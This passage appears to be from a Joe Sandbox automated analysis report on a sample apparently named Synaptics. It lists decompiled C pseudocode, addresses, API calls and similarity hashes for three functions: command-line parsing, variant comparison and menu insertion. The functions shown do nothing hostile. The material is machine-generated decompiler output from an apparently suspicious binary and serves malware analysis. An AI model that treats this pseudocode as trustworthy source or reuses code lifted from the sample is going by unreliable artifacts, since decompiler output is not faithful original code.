                                                                                                                                                                                                                            • API String ID: 120756276-0
                                                                                                                                                                                                                            • Opcode ID: 6fb2f2ebad3923b2675d5100b93e3e3b3c14a84b95167fdc7a6b0f3afa72cc61
                                                                                                                                                                                                                            • Instruction ID: 805600ea143b9581a1e299db5fe5220b0691e616ed58bf122693d2d560596f25
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6fb2f2ebad3923b2675d5100b93e3e3b3c14a84b95167fdc7a6b0f3afa72cc61
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 592174B1A04218FAEB10DBA5CD85F9E72ACEB08704F5104A6FB04F61C1D678AE54DB29
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00402A1C Relevance: 11.4, APIs: 9, Instructions: 109COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00402A1C(CHAR* __eax, intOrPtr* __edx) {
				char _t5;
				char _t6;
				CHAR* _t7;
				char _t9;
				CHAR* _t11;
				char _t14;
				CHAR* _t15;
				char _t17;
				CHAR* _t19;
				CHAR* _t22;
				CHAR* _t23;
				CHAR* _t32;
				intOrPtr _t33;
				intOrPtr* _t34;
				void* _t35;
				void* _t36;

				_t34 = __edx;
				_t22 = __eax;
				while(1) {
					L2:
					_t5 =  *_t22;
					if(_t5 != 0 && _t5 <= 0x20) {
						_t22 = CharNextA(_t22);
					}
					L2:
					_t5 =  *_t22;
					if(_t5 != 0 && _t5 <= 0x20) {
						_t22 = CharNextA(_t22);
					}
					L4:
					if( *_t22 != 0x22 || _t22[1] != 0x22) {
						_t36 = 0;
						_t32 = _t22;
						while(1) {
							_t6 =  *_t22;
							if(_t6 <= 0x20) {
								break;
							}
							if(_t6 != 0x22) {
								_t7 = CharNextA(_t22);
								_t36 = _t36 + _t7 - _t22;
								_t22 = _t7;
								continue;
							}
							_t22 = CharNextA(_t22);
							while(1) {
								_t9 =  *_t22;
								if(_t9 == 0 || _t9 == 0x22) {
									break;
								}
								_t11 = CharNextA(_t22);
								_t36 = _t36 + _t11 - _t22;
								_t22 = _t11;
							}
							if( *_t22 != 0) {
								_t22 = CharNextA(_t22);
							}
						}
						E0040500C(_t34, _t36);
						_t23 = _t32;
						_t33 =  *_t34;
						_t35 = 0;
						while(1) {
							_t14 =  *_t23;
							if(_t14 <= 0x20) {
								break;
							}
							if(_t14 != 0x22) {
								_t15 = CharNextA(_t23);
								if(_t15 <= _t23) {
									continue;
								} else {
									goto L27;
								}
								do {
									L27:
									 *((char*)(_t33 + _t35)) =  *_t23;
									_t23 =  &(_t23[1]);
									_t35 = _t35 + 1;
								} while (_t15 > _t23);
								continue;
							}
							_t23 = CharNextA(_t23);
							while(1) {
								_t17 =  *_t23;
								if(_t17 == 0 || _t17 == 0x22) {
									break;
								}
								_t19 = CharNextA(_t23);
								if(_t19 <= _t23) {
									continue;
								} else {
									goto L21;
								}
								do {
									L21:
									 *((char*)(_t33 + _t35)) =  *_t23;
									_t23 =  &(_t23[1]);
									_t35 = _t35 + 1;
								} while (_t19 > _t23);
							}
							if( *_t23 != 0) {
								_t23 = CharNextA(_t23);
							}
						}
						return _t23;
					} else {
						_t22 =  &(_t22[2]);
						continue;
					}
				}
			}



















                                                                                                                                                                                                                            0x00402a20
                                                                                                                                                                                                                            0x00402a22
                                                                                                                                                                                                                            0x00402a2e
                                                                                                                                                                                                                            0x00402a2e
                                                                                                                                                                                                                            0x00402a2e
                                                                                                                                                                                                                            0x00402a32
                                                                                                                                                                                                                            0x00402a2c
                                                                                                                                                                                                                            0x00402a2c
                                                                                                                                                                                                                            0x00402a2e
                                                                                                                                                                                                                            0x00402a2e
                                                                                                                                                                                                                            0x00402a32
                                                                                                                                                                                                                            0x00402a2c
                                                                                                                                                                                                                            0x00402a2c
                                                                                                                                                                                                                            0x00402a38
                                                                                                                                                                                                                            0x00402a3b
                                                                                                                                                                                                                            0x00402a48
                                                                                                                                                                                                                            0x00402a4a
                                                                                                                                                                                                                            0x00402a91
                                                                                                                                                                                                                            0x00402a91
                                                                                                                                                                                                                            0x00402a95
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402a50
                                                                                                                                                                                                                            0x00402a84
                                                                                                                                                                                                                            0x00402a8d
                                                                                                                                                                                                                            0x00402a8f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402a8f
                                                                                                                                                                                                                            0x00402a58
                                                                                                                                                                                                                            0x00402a6a
                                                                                                                                                                                                                            0x00402a6a
                                                                                                                                                                                                                            0x00402a6e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402a5d
                                                                                                                                                                                                                            0x00402a66
                                                                                                                                                                                                                            0x00402a68
                                                                                                                                                                                                                            0x00402a68
                                                                                                                                                                                                                            0x00402a77
                                                                                                                                                                                                                            0x00402a7f
                                                                                                                                                                                                                            0x00402a7f
                                                                                                                                                                                                                            0x00402a77
                                                                                                                                                                                                                            0x00402a9b
                                                                                                                                                                                                                            0x00402aa0
                                                                                                                                                                                                                            0x00402aa2
                                                                                                                                                                                                                            0x00402aa4
                                                                                                                                                                                                                            0x00402af9
                                                                                                                                                                                                                            0x00402af9
                                                                                                                                                                                                                            0x00402afd
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402aaa
                                                                                                                                                                                                                            0x00402ae5
                                                                                                                                                                                                                            0x00402aec
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402aee
                                                                                                                                                                                                                            0x00402aee
                                                                                                                                                                                                                            0x00402af0
                                                                                                                                                                                                                            0x00402af3
                                                                                                                                                                                                                            0x00402af4
                                                                                                                                                                                                                            0x00402af5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402aee
                                                                                                                                                                                                                            0x00402ab2
                                                                                                                                                                                                                            0x00402acb
                                                                                                                                                                                                                            0x00402acb
                                                                                                                                                                                                                            0x00402acf
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402ab7
                                                                                                                                                                                                                            0x00402abe
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402ac0
                                                                                                                                                                                                                            0x00402ac0
                                                                                                                                                                                                                            0x00402ac2
                                                                                                                                                                                                                            0x00402ac5
                                                                                                                                                                                                                            0x00402ac6
                                                                                                                                                                                                                            0x00402ac7
                                                                                                                                                                                                                            0x00402ac0
                                                                                                                                                                                                                            0x00402ad8
                                                                                                                                                                                                                            0x00402ae0
                                                                                                                                                                                                                            0x00402ae0
                                                                                                                                                                                                                            0x00402ad8
                                                                                                                                                                                                                            0x00402b05
                                                                                                                                                                                                                            0x00402a43
                                                                                                                                                                                                                            0x00402a43
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402a43
                                                                                                                                                                                                                            0x00402a3b

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CharNextA.USER32(00000000,?,00000000,00000000,?,00402BAE), ref: 00402A53
                                                                                                                                                                                                                            • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,00402BAE), ref: 00402A5D
                                                                                                                                                                                                                            • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,00402BAE), ref: 00402A7A
                                                                                                                                                                                                                            • CharNextA.USER32(00000000,?,00000000,00000000,?,00402BAE), ref: 00402A84
                                                                                                                                                                                                                            • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,00402BAE), ref: 00402AAD
                                                                                                                                                                                                                            • CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000000,?,00402BAE), ref: 00402AB7
                                                                                                                                                                                                                            • CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000000,?,00402BAE), ref: 00402ADB
                                                                                                                                                                                                                            • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,00402BAE), ref: 00402AE5
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CharNext
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3213498283-0
                                                                                                                                                                                                                            • Opcode ID: f6c631b9bfbba0fccf281f579f268ce96caef945665294b9e62958ec9ed3533e
                                                                                                                                                                                                                            • Instruction ID: 7f4eabc370d0c2b1a65279813ceea620399496a62879659d683f8910f88fef49
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f6c631b9bfbba0fccf281f579f268ce96caef945665294b9e62958ec9ed3533e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3621E5447443D21ADF7169B90EC83A76B894B5A31872804BB9582B63CBDCFC48479B6E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004166D4 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 334COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 69%
                                                                                                                                                                                                                            			E004166D4(signed short* __eax, signed int __ecx, signed short* __edx, void* __edi, void* __fp0) {
				signed short* _v8;
				signed int _v12;
				char _v13;
				signed int _v16;
				signed int _v18;
				char _v24;
				void* _v28;
				signed int _v44;
				void* __ebp;
				signed short _t136;
				signed short* _t256;
				intOrPtr _t307;
				intOrPtr _t310;
				intOrPtr _t318;
				intOrPtr _t325;
				intOrPtr _t333;
				signed int _t338;
				void* _t346;
				void* _t348;
				intOrPtr _t349;

				_t353 = __fp0;
				_t346 = _t348;
				_t349 = _t348 + 0xffffffd8;
				_v12 = __ecx;
				_v8 = __edx;
				_t256 = __eax;
				_v13 = 1;
				_t338 =  *((intOrPtr*)(__eax));
				if((_t338 & 0x00000fff) >= 0x10f) {
					_t136 =  *_v8;
					if(_t136 != 0) {
						if(_t136 != 1) {
							_t53 =  &_v24; // 0x416b58
							if(E0041713C(_t338, _t53) != 0) {
								_push( &_v18);
								_t56 =  &_v24; // 0x416b58
								if( *((intOrPtr*)( *((intOrPtr*)( *_t56)) + 8))() == 0) {
									_t341 =  *_v8;
									if(( *_v8 & 0x00000fff) >= 0x10f) {
										if(E0041713C(_t341,  &_v28) != 0) {
											_push( &_v16);
											if( *((intOrPtr*)( *_v28 + 4))() == 0) {
												E0041024C(0xb);
												goto L46;
											} else {
												if( *_t256 == _v16) {
													_t129 = ( *((intOrPtr*)( *_v28 + 0x34))(_v12) & 0x0000007f) - 0x1c; // 0xc3ffff94
													_v13 =  *((intOrPtr*)(0x49b404 + _v12 * 2 + _t129));
													goto L46;
												} else {
													_push( &_v44);
													L0040F318();
													_push(_t346);
													_push(0x416ab5);
													_push( *[fs:eax]);
													 *[fs:eax] = _t349;
													_t268 = _v16 & 0x0000ffff;
													E00411330( &_v44, _v16 & 0x0000ffff, _t256, __edi, __fp0);
													if(_v44 != _v16) {
														E0041015C(_t268);
													}
													_t118 = ( *((intOrPtr*)( *_v28 + 0x34))(_v12) & 0x0000007f) - 0x1c; // 0xc3ffff94
													_v13 =  *((intOrPtr*)(0x49b404 + _v12 * 2 + _t118));
													_pop(_t307);
													 *[fs:eax] = _t307;
													_push(E00416AE8);
													return E004109E8( &_v44);
												}
											}
										} else {
											E0041024C(0xb);
											goto L46;
										}
									} else {
										_push( &_v44);
										L0040F318();
										_push(_t346);
										_push(0x4169ff);
										_push( *[fs:eax]);
										 *[fs:eax] = _t349;
										_t273 =  *_v8 & 0x0000ffff;
										E00411330( &_v44,  *_v8 & 0x0000ffff, _t256, __edi, __fp0);
										if( *_v8 != _v44) {
											E0041015C(_t273);
										}
										_v13 = E00416548( &_v44, _v12, _v8, _t353);
										_pop(_t310);
										 *[fs:eax] = _t310;
										_push(E00416AE8);
										return E004109E8( &_v44);
									}
								} else {
									if( *_v8 == _v18) {
										_t79 =  &_v24; // 0x416b58
										_t85 = ( *((intOrPtr*)( *((intOrPtr*)( *_t79)) + 0x34))(_v12) & 0x0000007f) - 0x1c; // 0xc3ffff94
										_v13 =  *((intOrPtr*)(0x49b404 + _v12 * 2 + _t85));
										goto L46;
									} else {
										_push( &_v44);
										L0040F318();
										_push(_t346);
										_push(0x41695d);
										_push( *[fs:eax]);
										 *[fs:eax] = _t349;
										_t278 = _v18 & 0x0000ffff;
										E00411330( &_v44, _v18 & 0x0000ffff, _v8, __edi, __fp0);
										if(_v44 != _v18) {
											E0041015C(_t278);
										}
										_t68 =  &_v24; // 0x416b58
										_t74 = ( *((intOrPtr*)( *((intOrPtr*)( *_t68)) + 0x34))(_v12) & 0x0000007f) - 0x1c; // 0xc3ffff94
										_v13 =  *((intOrPtr*)(0x49b404 + _v12 * 2 + _t74));
										_pop(_t318);
										 *[fs:eax] = _t318;
										_push(E00416AE8);
										return E004109E8( &_v44);
									}
								}
							} else {
								E0041024C(__ecx);
								goto L46;
							}
						} else {
							_v13 = E00416328(_v12, 2);
							goto L46;
						}
					} else {
						_v13 = E00416314(0, 1);
						goto L46;
					}
				} else {
					if(_t338 != 0) {
						if(_t338 != 1) {
							if(E0041713C( *_v8,  &_v28) != 0) {
								_push( &_v16);
								if( *((intOrPtr*)( *_v28 + 4))() == 0) {
									_push( &_v44);
									L0040F318();
									_push(_t346);
									_push(0x41686d);
									_push( *[fs:eax]);
									 *[fs:eax] = _t349;
									_t284 =  *_t256 & 0x0000ffff;
									E00411330( &_v44,  *_t256 & 0x0000ffff, _v8, __edi, __fp0);
									if((_v44 & 0x00000fff) !=  *_t256) {
										E0041015C(_t284);
									}
									_v13 = E00416548(_t256, _v12,  &_v44, _t353);
									_pop(_t325);
									 *[fs:eax] = _t325;
									_push(E00416AE8);
									return E004109E8( &_v44);
								} else {
									if( *_t256 == _v16) {
										_t38 = ( *((intOrPtr*)( *_v28 + 0x34))(_v12) & 0x0000007f) - 0x1c; // 0xc3ffff94
										_v13 =  *((intOrPtr*)(0x49b404 + _v12 * 2 + _t38));
										goto L46;
									} else {
										_push( &_v44);
										L0040F318();
										_push(_t346);
										_push(0x4167df);
										_push( *[fs:eax]);
										 *[fs:eax] = _t349;
										_t289 = _v16 & 0x0000ffff;
										E00411330( &_v44, _v16 & 0x0000ffff, _t256, __edi, __fp0);
										if((_v44 & 0x00000fff) != _v16) {
											E0041015C(_t289);
										}
										_t27 = ( *((intOrPtr*)( *_v28 + 0x34))(_v12) & 0x0000007f) - 0x1c; // 0xc3ffff94
										_v13 =  *((intOrPtr*)(0x49b404 + _v12 * 2 + _t27));
										_pop(_t333);
										 *[fs:eax] = _t333;
										_push(E00416AE8);
										return E004109E8( &_v44);
									}
								}
							} else {
								E0041024C(__ecx);
								goto L46;
							}
						} else {
							_v13 = E00416328(_v12, 0);
							goto L46;
						}
					} else {
						_v13 = E00416314(1, 0);
						L46:
						return _v13;
					}
				}
			}























                                                                                                                                                                                                                            0x004166d4
                                                                                                                                                                                                                            0x004166d5
                                                                                                                                                                                                                            0x004166d7
                                                                                                                                                                                                                            0x004166dc
                                                                                                                                                                                                                            0x004166df
                                                                                                                                                                                                                            0x004166e2
                                                                                                                                                                                                                            0x004166e4
                                                                                                                                                                                                                            0x004166e8
                                                                                                                                                                                                                            0x004166f5
                                                                                                                                                                                                                            0x00416877
                                                                                                                                                                                                                            0x0041687d
                                                                                                                                                                                                                            0x00416897
                                                                                                                                                                                                                            0x004168ad
                                                                                                                                                                                                                            0x004168b9
                                                                                                                                                                                                                            0x004168c8
                                                                                                                                                                                                                            0x004168d1
                                                                                                                                                                                                                            0x004168db
                                                                                                                                                                                                                            0x00416991
                                                                                                                                                                                                                            0x0041699e
                                                                                                                                                                                                                            0x00416a15
                                                                                                                                                                                                                            0x00416a24
                                                                                                                                                                                                                            0x00416a36
                                                                                                                                                                                                                            0x00416ae3
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00416a3c
                                                                                                                                                                                                                            0x00416a43
                                                                                                                                                                                                                            0x00416ada
                                                                                                                                                                                                                            0x00416ade
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00416a45
                                                                                                                                                                                                                            0x00416a48
                                                                                                                                                                                                                            0x00416a49
                                                                                                                                                                                                                            0x00416a50
                                                                                                                                                                                                                            0x00416a51
                                                                                                                                                                                                                            0x00416a56
                                                                                                                                                                                                                            0x00416a59
                                                                                                                                                                                                                            0x00416a5c
                                                                                                                                                                                                                            0x00416a65
                                                                                                                                                                                                                            0x00416a72
                                                                                                                                                                                                                            0x00416a74
                                                                                                                                                                                                                            0x00416a74
                                                                                                                                                                                                                            0x00416a98
                                                                                                                                                                                                                            0x00416a9c
                                                                                                                                                                                                                            0x00416aa1
                                                                                                                                                                                                                            0x00416aa4
                                                                                                                                                                                                                            0x00416aa7
                                                                                                                                                                                                                            0x00416ab4
                                                                                                                                                                                                                            0x00416ab4
                                                                                                                                                                                                                            0x00416a43
                                                                                                                                                                                                                            0x00416a17
                                                                                                                                                                                                                            0x00416a17
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00416a17
                                                                                                                                                                                                                            0x004169a0
                                                                                                                                                                                                                            0x004169a3
                                                                                                                                                                                                                            0x004169a4
                                                                                                                                                                                                                            0x004169ab
                                                                                                                                                                                                                            0x004169ac
                                                                                                                                                                                                                            0x004169b1
                                                                                                                                                                                                                            0x004169b4
                                                                                                                                                                                                                            0x004169ba
                                                                                                                                                                                                                            0x004169c2
                                                                                                                                                                                                                            0x004169d1
                                                                                                                                                                                                                            0x004169d3
                                                                                                                                                                                                                            0x004169d3
                                                                                                                                                                                                                            0x004169e6
                                                                                                                                                                                                                            0x004169eb
                                                                                                                                                                                                                            0x004169ee
                                                                                                                                                                                                                            0x004169f1
                                                                                                                                                                                                                            0x004169fe
                                                                                                                                                                                                                            0x004169fe
                                                                                                                                                                                                                            0x004168e1
                                                                                                                                                                                                                            0x004168eb
                                                                                                                                                                                                                            0x0041696d
                                                                                                                                                                                                                            0x00416982
                                                                                                                                                                                                                            0x00416986
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004168ed
                                                                                                                                                                                                                            0x004168f0
                                                                                                                                                                                                                            0x004168f1
                                                                                                                                                                                                                            0x004168f8
                                                                                                                                                                                                                            0x004168f9
                                                                                                                                                                                                                            0x004168fe
                                                                                                                                                                                                                            0x00416901
                                                                                                                                                                                                                            0x00416904
                                                                                                                                                                                                                            0x0041690e
                                                                                                                                                                                                                            0x0041691b
                                                                                                                                                                                                                            0x0041691d
                                                                                                                                                                                                                            0x0041691d
                                                                                                                                                                                                                            0x0041692b
                                                                                                                                                                                                                            0x00416940
                                                                                                                                                                                                                            0x00416944
                                                                                                                                                                                                                            0x00416949
                                                                                                                                                                                                                            0x0041694c
                                                                                                                                                                                                                            0x0041694f
                                                                                                                                                                                                                            0x0041695c
                                                                                                                                                                                                                            0x0041695c
                                                                                                                                                                                                                            0x004168eb
                                                                                                                                                                                                                            0x004168bb
                                                                                                                                                                                                                            0x004168bb
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004168bb
                                                                                                                                                                                                                            0x00416899
                                                                                                                                                                                                                            0x004168a5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004168a5
                                                                                                                                                                                                                            0x0041687f
                                                                                                                                                                                                                            0x00416888
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00416888
                                                                                                                                                                                                                            0x004166fb
                                                                                                                                                                                                                            0x004166fe
                                                                                                                                                                                                                            0x00416715
                                                                                                                                                                                                                            0x0041673b
                                                                                                                                                                                                                            0x0041674a
                                                                                                                                                                                                                            0x0041675c
                                                                                                                                                                                                                            0x00416813
                                                                                                                                                                                                                            0x00416814
                                                                                                                                                                                                                            0x0041681b
                                                                                                                                                                                                                            0x0041681c
                                                                                                                                                                                                                            0x00416821
                                                                                                                                                                                                                            0x00416824
                                                                                                                                                                                                                            0x00416827
                                                                                                                                                                                                                            0x00416830
                                                                                                                                                                                                                            0x00416840
                                                                                                                                                                                                                            0x00416842
                                                                                                                                                                                                                            0x00416842
                                                                                                                                                                                                                            0x00416854
                                                                                                                                                                                                                            0x00416859
                                                                                                                                                                                                                            0x0041685c
                                                                                                                                                                                                                            0x0041685f
                                                                                                                                                                                                                            0x0041686c
                                                                                                                                                                                                                            0x00416762
                                                                                                                                                                                                                            0x00416769
                                                                                                                                                                                                                            0x00416804
                                                                                                                                                                                                                            0x00416808
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0041676b
                                                                                                                                                                                                                            0x0041676e
                                                                                                                                                                                                                            0x0041676f
                                                                                                                                                                                                                            0x00416776
                                                                                                                                                                                                                            0x00416777
                                                                                                                                                                                                                            0x0041677c
                                                                                                                                                                                                                            0x0041677f
                                                                                                                                                                                                                            0x00416782
                                                                                                                                                                                                                            0x0041678b
                                                                                                                                                                                                                            0x0041679c
                                                                                                                                                                                                                            0x0041679e
                                                                                                                                                                                                                            0x0041679e
                                                                                                                                                                                                                            0x004167c2
                                                                                                                                                                                                                            0x004167c6
                                                                                                                                                                                                                            0x004167cb
                                                                                                                                                                                                                            0x004167ce
                                                                                                                                                                                                                            0x004167d1
                                                                                                                                                                                                                            0x004167de
                                                                                                                                                                                                                            0x004167de
                                                                                                                                                                                                                            0x00416769
                                                                                                                                                                                                                            0x0041673d
                                                                                                                                                                                                                            0x0041673d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0041673d
                                                                                                                                                                                                                            0x00416717
                                                                                                                                                                                                                            0x00416723
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00416723
                                                                                                                                                                                                                            0x00416700
                                                                                                                                                                                                                            0x00416709
                                                                                                                                                                                                                            0x00416ae8
                                                                                                                                                                                                                            0x00416af0
                                                                                                                                                                                                                            0x00416af0
                                                                                                                                                                                                                            0x004166fe

                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: XkA
                                                                                                                                                                                                                            • API String ID: 0-440165744
                                                                                                                                                                                                                            • Opcode ID: 33095617600c0f76cb91287695ca0870e369363d944ea869185c57052bf95faf
                                                                                                                                                                                                                            • Instruction ID: 126fbda12782d38e062267a272fec00c664f0fd244103826fb372783f4e2cac9
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 33095617600c0f76cb91287695ca0870e369363d944ea869185c57052bf95faf
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A0D18339A00149AFCF00EF94C4819EEBBB5EF49314F5544AAE840B7355D638EEC6CB69
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0044A960 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 187windowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 87%
                                                                                                                                                                                                                            			E0044A960(void* __eax, void* __ebx, char __ecx, struct HMENU__* __edx, void* __edi, void* __esi) {
				char _v5;
				char _v12;
				char _v13;
				struct tagMENUITEMINFOA _v61;
				char _v68;
				intOrPtr _t103;
				CHAR* _t109;
				char _t115;
				short _t149;
				void* _t154;
				intOrPtr _t161;
				intOrPtr _t184;
				struct HMENU__* _t186;
				int _t190;
				void* _t192;
				intOrPtr _t193;
				void* _t196;
				void* _t205;

				_t155 = __ecx;
				_v68 = 0;
				_v12 = 0;
				_v5 = __ecx;
				_t186 = __edx;
				_t154 = __eax;
				_push(_t196);
				_push(0x44abbb);
				_push( *[fs:eax]);
				 *[fs:eax] = _t196 + 0xffffffc0;
				if( *((char*)(__eax + 0x3e)) == 0) {
					L22:
					_pop(_t161);
					 *[fs:eax] = _t161;
					_push(0x44abc2);
					E004049C0( &_v68);
					return E004049C0( &_v12);
				}
				E00404A58( &_v12,  *((intOrPtr*)(__eax + 0x30)));
				if(E0044C8DC(_t154) <= 0) {
					__eflags =  *((short*)(_t154 + 0x60));
					if( *((short*)(_t154 + 0x60)) == 0) {
						L8:
						if((GetVersion() & 0x000000ff) < 4) {
							_t190 =  *(0x49bdf0 + ((E00404DCC( *((intOrPtr*)(_t154 + 0x30)), 0x44abe0) & 0xffffff00 | __eflags == 0x00000000) & 0x0000007f) * 4) |  *0x0049BDE4 |  *0x0049BDD4 |  *0x0049BDDC | 0x00000400;
							_t103 = E0044C8DC(_t154);
							__eflags = _t103;
							if(_t103 <= 0) {
								InsertMenuA(_t186, 0xffffffff, _t190,  *(_t154 + 0x50) & 0x0000ffff, E00404E80(_v12));
							} else {
								_t109 = E00404E80( *((intOrPtr*)(_t154 + 0x30)));
								InsertMenuA(_t186, 0xffffffff, _t190 | 0x00000010, E0044AE70(_t154), _t109);
							}
							goto L22;
						}
						_v61.cbSize = 0x2c;
						_v61.fMask = 0x3f;
						_t192 = E0044CE98(_t154);
						if(_t192 == 0 ||  *((char*)(_t192 + 0x40)) == 0 && E0044C4B4(_t154) == 0) {
							if( *((intOrPtr*)(_t154 + 0x4c)) == 0) {
								L14:
								_t115 = 0;
								goto L16;
							}
							_t205 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x4c)))) + 0x1c))();
							if(_t205 == 0) {
								goto L15;
							}
							goto L14;
						} else {
							L15:
							_t115 = 1;
							L16:
							_v13 = _t115;
							_v61.fType =  *(0x49be24 + ((E00404DCC( *((intOrPtr*)(_t154 + 0x30)), 0x44abe0) & 0xffffff00 | _t205 == 0x00000000) & 0x0000007f) * 4) |  *0x0049BE1C |  *0x0049BDF8 |  *0x0049BE2C |  *0x0049BE34;
							_v61.fState =  *0x0049BE04 |  *0x0049BE14 |  *0x0049BE0C;
							_v61.wID =  *(_t154 + 0x50) & 0x0000ffff;
							_v61.hSubMenu = 0;
							_v61.hbmpChecked = 0;
							_v61.hbmpUnchecked = 0;
							_v61.dwTypeData = E00404E80(_v12);
							if(E0044C8DC(_t154) > 0) {
								_v61.hSubMenu = E0044AE70(_t154);
							}
							InsertMenuItemA(_t186, 0xffffffff, 0xffffffff,  &_v61);
							goto L22;
						}
					}
					_t193 =  *((intOrPtr*)(_t154 + 0x64));
					__eflags = _t193;
					if(_t193 == 0) {
						L7:
						_push(_v12);
						_push(0x44abd4);
						E00449FC4( *((intOrPtr*)(_t154 + 0x60)), _t154, _t155,  &_v68, _t193);
						_push(_v68);
						E00404D40();
						goto L8;
					}
					__eflags =  *((intOrPtr*)(_t193 + 0x64));
					if( *((intOrPtr*)(_t193 + 0x64)) != 0) {
						goto L7;
					}
					_t184 =  *0x449854; // 0x4498a0
					_t149 = E00403D78( *((intOrPtr*)(_t193 + 4)), _t184);
					__eflags = _t149;
					if(_t149 != 0) {
						goto L8;
					}
					goto L7;
				}
				_v61.hSubMenu = E0044AE70(_t154);
				goto L8;
			}





















                                                                                                                                                                                                                            0x0044a960
                                                                                                                                                                                                                            0x0044a96b
                                                                                                                                                                                                                            0x0044a96e
                                                                                                                                                                                                                            0x0044a971
                                                                                                                                                                                                                            0x0044a974
                                                                                                                                                                                                                            0x0044a976
                                                                                                                                                                                                                            0x0044a97a
                                                                                                                                                                                                                            0x0044a97b
                                                                                                                                                                                                                            0x0044a980
                                                                                                                                                                                                                            0x0044a983
                                                                                                                                                                                                                            0x0044a98a
                                                                                                                                                                                                                            0x0044ab9d
                                                                                                                                                                                                                            0x0044ab9f
                                                                                                                                                                                                                            0x0044aba2
                                                                                                                                                                                                                            0x0044aba5
                                                                                                                                                                                                                            0x0044abad
                                                                                                                                                                                                                            0x0044abba
                                                                                                                                                                                                                            0x0044abba
                                                                                                                                                                                                                            0x0044a996
                                                                                                                                                                                                                            0x0044a9a4
                                                                                                                                                                                                                            0x0044a9b2
                                                                                                                                                                                                                            0x0044a9b7
                                                                                                                                                                                                                            0x0044a9fc
